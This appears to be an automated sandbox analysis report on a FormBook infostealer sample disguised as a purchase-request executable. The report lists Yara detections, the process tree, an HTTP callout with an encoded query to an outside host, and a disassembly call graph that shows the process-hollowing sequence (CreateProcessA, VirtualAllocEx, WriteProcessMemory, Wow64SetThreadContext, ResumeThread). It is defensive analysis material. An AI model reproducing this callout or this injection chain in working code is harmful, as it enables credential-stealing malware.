                                                                                    0192.168.2.44974379.98.25.1804048C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Apr 23, 2024 14:23:35.363733053 CEST468OUTGET /aleu/?lT2ltVXh=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&66=uX3d2 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.maxiwalls.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                    Apr 23, 2024 14:23:35.592740059 CEST1289INHTTP/1.1 200 OK
                                                                                    Date: Tue, 23 Apr 2024 12:23:35 GMT
                                                                                    Server: Apache
                                                                                    Cache-control: max-age=300
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5662
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 6d 61 78 69 77 61 6c 6c 73 2e 63 6f 6d 20 2d 20 55 c5 be 72 65 67 69 73 74 72 75 6f 74 61 73 20 64 6f 6d 65 6e 61 73 20 2d 20 49 6e 74 65 72 6e 65 74 6f 20 76 69 7a 69 6a 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 3c 2f 68 65 61 64 3e 0d 0a 20 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 20 20 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a 20 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 68 65 61 64 65 72 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 37 36 38 20 68 65 69 67 68 74 3d 31 30 30 20 73 63 72 6f 6c 6c 69 6e 67 3d 6e 6f 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 3c 74 72 3e 3c 74 64 20 68 65 69 67 68 74 3d 32 34 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0d 0a 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 3c 21 2d 2d 20 65 6e 64 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 62 6f 64 79 20 2d 2d 3e 0d 0a 0d
                                                                                    Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table>... end header -->... begin body -->
                                                                                    Apr 23, 2024 14:23:35.592761040 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                    Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                    Apr 23, 2024 14:23:35.592780113 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                                                                                    Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                    Apr 23, 2024 14:23:35.592797995 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                                                                                    Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                    Apr 23, 2024 14:23:35.592814922 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                                                                                    Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:14:22:52
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
                                                                                    Imagebase:0xec0000
                                                                                    File size:723'464 bytes
                                                                                    MD5 hash:73B6E5A11AFF9E7BD681B55136C5FBCF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:14:22:54
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
                                                                                    Imagebase:0x990000
                                                                                    File size:723'464 bytes
                                                                                    MD5 hash:73B6E5A11AFF9E7BD681B55136C5FBCF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:14:23:14
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe"
                                                                                    Imagebase:0x9b0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:14:23:15
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Windows\SysWOW64\replace.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                    Imagebase:0x3b0000
                                                                                    File size:18'944 bytes
                                                                                    MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:14:23:28
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe"
                                                                                    Imagebase:0x9b0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:14:23:40
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:214
                                                                                      Total number of Limit Nodes:23
                                                                                      execution_graph 28770 16a4668 28771 16a467a 28770->28771 28772 16a4686 28771->28772 28774 16a4779 28771->28774 28775 16a479d 28774->28775 28779 16a4878 28775->28779 28783 16a4888 28775->28783 28781 16a4888 28779->28781 28780 16a498c 28781->28780 28787 16a44b0 28781->28787 28785 16a48af 28783->28785 28784 16a498c 28784->28784 28785->28784 28786 16a44b0 CreateActCtxA 28785->28786 28786->28784 28788 16a5918 CreateActCtxA 28787->28788 28790 16a59db 28788->28790 29008 16aacc8 29011 16aadb0 29008->29011 29009 16aacd7 29012 16aadd1 29011->29012 29013 16aadf4 29011->29013 29012->29013 29019 16ab448 29012->29019 29023 16ab458 29012->29023 29013->29009 29014 16aaff8 GetModuleHandleW 29016 16ab025 29014->29016 29015 16aadec 29015->29013 29015->29014 29016->29009 29020 16ab458 29019->29020 29021 16ab491 29020->29021 29027 16ab048 29020->29027 29021->29015 29024 16ab46c 29023->29024 29025 16ab048 LoadLibraryExW 29024->29025 29026 16ab491 29024->29026 29025->29026 29026->29015 29028 16ab618 LoadLibraryExW 29027->29028 29030 16ab691 29028->29030 29030->29021 29031 16ad158 29032 16ad15d GetCurrentProcess 29031->29032 29034 16ad1e9 29032->29034 29035 16ad1f0 GetCurrentThread 29032->29035 29034->29035 29036 16ad22d GetCurrentProcess 29035->29036 29037 16ad226 29035->29037 29038 16ad263 29036->29038 29037->29036 29039 16ad28b GetCurrentThreadId 29038->29039 29040 16ad2bc 29039->29040 28793 7d87d40 28794 7d87ecb 28793->28794 28796 7d87d66 28793->28796 28796->28794 28797 7d843d0 28796->28797 28798 7d87fc0 PostMessageW 28797->28798 28799 7d8802c 28798->28799 28799->28796 28791 16ad3a0 DuplicateHandle 28792 16ad436 28791->28792 28800 7d86443 28801 7d863b8 28800->28801 28802 7d862c7 28800->28802 28801->28800 28805 7d86b80 28801->28805 28810 7d86b71 28801->28810 28806 7d86b95 28805->28806 28815 7d86bb1 28806->28815 28834 7d86c26 28806->28834 28807 7d86ba7 28807->28801 28811 7d86b80 28810->28811 28813 7d86bb1 12 API calls 28811->28813 28814 7d86c26 12 API calls 28811->28814 28812 7d86ba7 28812->28801 28813->28812 28814->28812 28816 7d86bb4 28815->28816 28827 7d86be2 28816->28827 28854 7d871a3 28816->28854 28862 7d8768e 28816->28862 28870 7d870ee 28816->28870 28879 7d8706d 28816->28879 28888 7d8730a 28816->28888 28893 7d8742a 28816->28893 28898 7d874e8 28816->28898 28903 7d872a8 28816->28903 28912 7d874f7 28816->28912 28918 7d873f7 28816->28918 28923 7d870b4 28816->28923 28937 7d8701e 28816->28937 28941 7d873bc 28816->28941 28946 7d870db 28816->28946 28951 7d87138 28816->28951 28956 7d87967 28816->28956 28827->28807 28835 7d86bb4 28834->28835 28837 7d86c29 28834->28837 28836 7d86be2 28835->28836 28838 7d87138 2 API calls 28835->28838 28839 7d870db 3 API calls 28835->28839 28840 7d873bc 2 API calls 28835->28840 28841 7d8701e 2 API calls 28835->28841 28842 7d870b4 7 API calls 28835->28842 28843 7d873f7 3 API calls 28835->28843 28844 7d874f7 2 API calls 28835->28844 28845 7d872a8 5 API calls 28835->28845 28846 7d874e8 2 API calls 28835->28846 28847 7d8742a 2 API calls 28835->28847 28848 7d8730a 2 API calls 28835->28848 28849 7d8706d 5 API calls 28835->28849 28850 7d870ee 5 API calls 28835->28850 28851 7d8768e 2 API calls 28835->28851 28852 7d871a3 5 API calls 28835->28852 28853 7d87967 2 API calls 28835->28853 28836->28807 28837->28807 28838->28836 28839->28836 28840->28836 28841->28836 28842->28836 28843->28836 28844->28836 28845->28836 28846->28836 28847->28836 28848->28836 28849->28836 28850->28836 28851->28836 28852->28836 28853->28836 28856 7d87079 28854->28856 28855 7d8708b 28968 7d8591b 28855->28968 28976 7d85920 28855->28976 28856->28855 28857 7d87304 28856->28857 28960 7d85aa8 28856->28960 28964 7d85aa1 28856->28964 28857->28827 28863 7d87694 28862->28863 28867 7d85c50 ReadProcessMemory 28863->28867 28980 7d85c58 28863->28980 28864 7d8749f 28864->28827 28865 7d873fc 28864->28865 28868 7d85c58 ReadProcessMemory 28864->28868 28984 7d85c50 28864->28984 28865->28827 28867->28864 28868->28864 28872 7d87079 28870->28872 28871 7d8708b 28877 7d8591b 2 API calls 28871->28877 28878 7d85920 ResumeThread 28871->28878 28872->28871 28873 7d87304 28872->28873 28875 7d85aa8 VirtualAllocEx 28872->28875 28876 7d85aa1 VirtualAllocEx 28872->28876 28874 7d8750a 28874->28827 28875->28872 28876->28872 28877->28874 28878->28874 28880 7d87079 28879->28880 28881 7d8708b 28880->28881 28883 7d87304 28880->28883 28884 7d85aa8 VirtualAllocEx 28880->28884 28885 7d85aa1 VirtualAllocEx 28880->28885 28886 7d8591b 2 API calls 28881->28886 28887 7d85920 ResumeThread 28881->28887 28882 7d8750a 28882->28827 28884->28880 28885->28880 28886->28882 28887->28882 28889 7d87310 28888->28889 28889->28827 28890 7d873fc 28889->28890 28891 7d85c58 ReadProcessMemory 28889->28891 28892 7d85c50 ReadProcessMemory 28889->28892 28890->28827 28891->28889 28892->28889 28895 7d873b3 28893->28895 28894 7d87912 28894->28827 28895->28894 28988 7d85b68 28895->28988 28992 7d85b61 28895->28992 28899 7d8749f 28898->28899 28899->28827 28900 7d873fc 28899->28900 28901 7d85c58 ReadProcessMemory 28899->28901 28902 7d85c50 ReadProcessMemory 28899->28902 28900->28827 28901->28899 28902->28899 28910 7d85aa8 VirtualAllocEx 28903->28910 28911 7d85aa1 VirtualAllocEx 28903->28911 28904 7d87304 28905 7d87079 28905->28903 28905->28904 28906 7d8708b 28905->28906 28908 7d8591b 2 API calls 28906->28908 28909 7d85920 ResumeThread 28906->28909 28907 7d8750a 28907->28827 28908->28907 28909->28907 28910->28905 28911->28905 28913 7d87504 28912->28913 28914 7d87321 28912->28914 28913->28827 28914->28827 28915 7d873fc 28914->28915 28916 7d85c58 ReadProcessMemory 28914->28916 28917 7d85c50 ReadProcessMemory 28914->28917 28915->28827 28916->28914 28917->28914 28919 7d875e1 28918->28919 28921 7d8591b 2 API calls 28919->28921 28996 7d859d0 28919->28996 28920 7d875fc 28921->28920 28924 7d870ba 28923->28924 28925 7d87079 28924->28925 28928 7d87355 28924->28928 28926 7d8708b 28925->28926 28929 7d87304 28925->28929 28931 7d85aa8 VirtualAllocEx 28925->28931 28932 7d85aa1 VirtualAllocEx 28925->28932 28933 7d8591b 2 API calls 28926->28933 28934 7d85920 ResumeThread 28926->28934 28927 7d8786d 28927->28827 28928->28927 28935 7d85b68 WriteProcessMemory 28928->28935 28936 7d85b61 WriteProcessMemory 28928->28936 28930 7d8750a 28930->28827 28931->28925 28932->28925 28933->28930 28934->28930 28935->28928 28936->28928 29000 7d85df0 28937->29000 29004 7d85de5 28937->29004 28942 7d873b3 28941->28942 28942->28941 28943 7d87912 28942->28943 28944 7d85b68 WriteProcessMemory 28942->28944 28945 7d85b61 WriteProcessMemory 28942->28945 28943->28827 28944->28942 28945->28942 28947 7d870e8 28946->28947 28949 7d8591b 2 API calls 28947->28949 28950 7d859d0 Wow64SetThreadContext 28947->28950 28948 7d8788e 28949->28948 28950->28948 28952 7d87150 28951->28952 28952->28827 28953 7d873fc 28952->28953 28954 7d85c58 ReadProcessMemory 28952->28954 28955 7d85c50 ReadProcessMemory 28952->28955 28953->28827 28954->28952 28955->28952 28958 7d85b68 WriteProcessMemory 28956->28958 28959 7d85b61 WriteProcessMemory 28956->28959 28957 7d8799a 28958->28957 28959->28957 28961 7d85ae8 VirtualAllocEx 28960->28961 28963 7d85b25 28961->28963 28963->28856 28965 7d85ae8 VirtualAllocEx 28964->28965 28967 7d85b25 28965->28967 28967->28856 28969 7d8591e 28968->28969 28970 7d859ca Wow64SetThreadContext 28969->28970 28971 7d85960 ResumeThread 28969->28971 28975 7d85a5d 28970->28975 28973 7d85991 28971->28973 28973->28857 28975->28857 28977 7d85960 ResumeThread 28976->28977 28979 7d85991 28977->28979 28979->28857 28981 7d85ca3 ReadProcessMemory 28980->28981 28983 7d85ce7 28981->28983 28983->28864 28985 7d85ca3 ReadProcessMemory 28984->28985 28987 7d85ce7 28985->28987 28987->28864 28989 7d85bb0 WriteProcessMemory 28988->28989 28991 7d85c07 28989->28991 28991->28895 28993 7d85bb0 WriteProcessMemory 28992->28993 28995 7d85c07 28993->28995 28995->28895 28997 7d85a15 Wow64SetThreadContext 28996->28997 28999 7d85a5d 28997->28999 28999->28920 29001 7d85e79 CreateProcessA 29000->29001 29003 7d8603b 29001->29003 29003->29003 29005 7d85e79 CreateProcessA 29004->29005 29007 7d8603b 29005->29007 29007->29007

                                                                                      Executed Functions

                                                                                      Function 07B22910 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 452 7b22910-7b22933 453 7b22935 452->453 454 7b2293a-7b229b0 452->454 453->454 459 7b229b3 454->459 460 7b229ba-7b229d6 459->460 461 7b229d8 460->461 462 7b229df-7b229e0 460->462 461->459 461->462 463 7b22b12-7b22b29 461->463 464 7b22a40-7b22a44 461->464 465 7b22a70-7b22a82 461->465 466 7b22af1-7b22b0d 461->466 467 7b22ab6-7b22aec 461->467 468 7b22a87-7b22ab1 461->468 469 7b229e5-7b229fa 461->469 470 7b22b2e-7b22b9e 461->470 471 7b229fc-7b22a3b 461->471 462->470 463->460 472 7b22a46-7b22a55 464->472 473 7b22a57-7b22a5e 464->473 465->460 466->460 467->460 468->460 469->460 485 7b22ba0 call 7b23c01 470->485 486 7b22ba0 call 7b24184 470->486 487 7b22ba0 call 7b23f65 470->487 488 7b22ba0 call 7b241fc 470->488 471->460 475 7b22a65-7b22a6b 472->475 473->475 475->460 484 7b22ba6-7b22bb0 485->484 486->484 487->484 488->484
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 81fd3442bbe70f3ac801fdc1f451c207cfbeafc747a39704ece34247387bf620
                                                                                      • Instruction ID: d69a730a7ec80e6eac01b78b4cc6e814d054279c921a7ee03a2f9c5f92ffd275
                                                                                      • Opcode Fuzzy Hash: 81fd3442bbe70f3ac801fdc1f451c207cfbeafc747a39704ece34247387bf620
                                                                                      • Instruction Fuzzy Hash: 9A81E5B4E012199FDB08CFAAC9846DEFBB2FF89300F24942AD419AB358D7355946CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2290B Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 489 7b2290b-7b22933 491 7b22935 489->491 492 7b2293a-7b229b0 489->492 491->492 497 7b229b3 492->497 498 7b229ba-7b229d6 497->498 499 7b229d8 498->499 500 7b229df-7b229e0 498->500 499->497 499->500 501 7b22b12-7b22b29 499->501 502 7b22a40-7b22a44 499->502 503 7b22a70-7b22a82 499->503 504 7b22af1-7b22b0d 499->504 505 7b22ab6-7b22aec 499->505 506 7b22a87-7b22ab1 499->506 507 7b229e5-7b229fa 499->507 508 7b22b2e-7b22b9e 499->508 509 7b229fc-7b22a3b 499->509 500->508 501->498 510 7b22a46-7b22a55 502->510 511 7b22a57-7b22a5e 502->511 503->498 504->498 505->498 506->498 507->498 523 7b22ba0 call 7b23c01 508->523 524 7b22ba0 call 7b24184 508->524 525 7b22ba0 call 7b23f65 508->525 526 7b22ba0 call 7b241fc 508->526 509->498 513 7b22a65-7b22a6b 510->513 511->513 513->498 522 7b22ba6-7b22bb0 523->522 524->522 525->522 526->522
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
